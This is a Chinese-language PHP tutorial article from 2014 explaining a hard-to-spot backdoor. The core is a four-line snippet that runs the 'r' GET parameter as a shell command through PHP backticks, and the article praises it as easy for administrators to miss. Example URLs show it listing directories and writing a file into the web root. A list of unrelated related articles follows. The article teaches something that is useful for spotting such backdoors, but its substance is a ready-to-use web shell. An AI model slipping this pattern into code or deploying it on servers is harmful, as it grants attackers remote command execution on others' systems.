一個不易被發(fā)現(xiàn)的PHP后門代碼解析

更新時間：2014年07月05日 16:16:53 投稿：shichen2014

這篇文章主要介紹了一個不易被發(fā)現(xiàn)的PHP后門代碼解析，對于網(wǎng)絡(luò)安全來說非常重要,需要的朋友可以參考下

偶然間看到一段，看起來似乎沒有什么問題，確是能致命的后門代碼，這里用到了一個一般的PHPer都不怎么關(guān)注的反撇號 ` ，反撇號包含的字符串，等同于shell_exec函數(shù)。

偽裝性很好，很容易被管理員忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

剛看到這段代碼我想大家都會說沒有問題，但是細(xì)心的朋友也會發(fā)現(xiàn)下面的變量被一個符號包起來了，既然是變量為什么要這樣了，

而且又不是單引號，這個就是關(guān)鍵所在了，這個符號是 Esc 下面的一個鍵（位于感嘆號！旁邊的），

通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php

我用 appserv 和虛擬主機已經(jīng)測試成功。

您可能感興趣的文章:

相關(guān)文章

PHP浮點數(shù)精度問題匯總
這篇文章主要介紹了PHP浮點數(shù)精度問題匯總,本文著重探討PHP浮點數(shù)精度損失問題,用三個段落不同的方式講解了這個問題的形成原因以及解決方法,需要的朋友可以參考下
2015-05-05
解析php中反射的應(yīng)用
本篇文章是對php中反射的應(yīng)用進(jìn)行了詳細(xì)的分析介紹，需要的朋友參考下
2013-06-06
使用Zookeeper分布式部署PHP應(yīng)用程序
今天小編就為大家分享一篇關(guān)于使用Zookeeper分布式部署PHP應(yīng)用程序，小編覺得內(nèi)容挺不錯的，現(xiàn)在分享給大家，具有很好的參考價值，需要的朋友一起跟隨小編來看看吧
2019-03-03
PHP基于PDO調(diào)用sqlserver存儲過程通用方法【基于Yii框架】
這篇文章主要介紹了PHP基于PDO調(diào)用sqlserver存儲過程通用方法,結(jié)合實例形式分析了基于Yii框架采用pdo調(diào)用sqlserver存儲過程的相關(guān)操作步驟與實現(xiàn)技巧,需要的朋友可以參考下
2017-10-10
php中的路徑問題與set_include_path使用介紹
這篇文章主要介紹了php中的路徑問題與set_include_path,需要的朋友可以參考下
2014-02-02
Zend Guard使用指南及問題處理
這篇文章主要介紹了Zend Guard使用指南及問題處理,需要的朋友可以參考下
2015-01-01
PHP實現(xiàn)采集抓取淘寶網(wǎng)單個商品信息
這篇文章主要介紹了PHP實現(xiàn)采集抓取淘寶網(wǎng)單個商品信息,本文是一種實現(xiàn)思路,使用file_get_contents函數(shù)實現(xiàn),并給出了采集正則,需要的朋友可以參考下
2015-01-01
php版微信小店API二次開發(fā)及使用示例
這篇文章主要介紹了php版微信小店API二次開發(fā)及使用方法,結(jié)合實例形式分析了針對微信小店API的調(diào)用及使用方法,需要的朋友可以參考下
2016-11-11
PHP中創(chuàng)建和驗證哈希的簡單方法實探
這篇文章主要介紹了PHP中創(chuàng)建和驗證哈希的簡單方法,即為Password Hashing API的使用介紹,需要的朋友可以參考下
2015-07-07
PHP中使用虛代理實現(xiàn)延遲加載技術(shù)
這篇文章主要介紹了PHP中使用虛代理實現(xiàn)延遲加載技術(shù),延遲加載是一種領(lǐng)域模型設(shè)計一種架構(gòu)模式,需要的朋友可以參考下
2014-11-11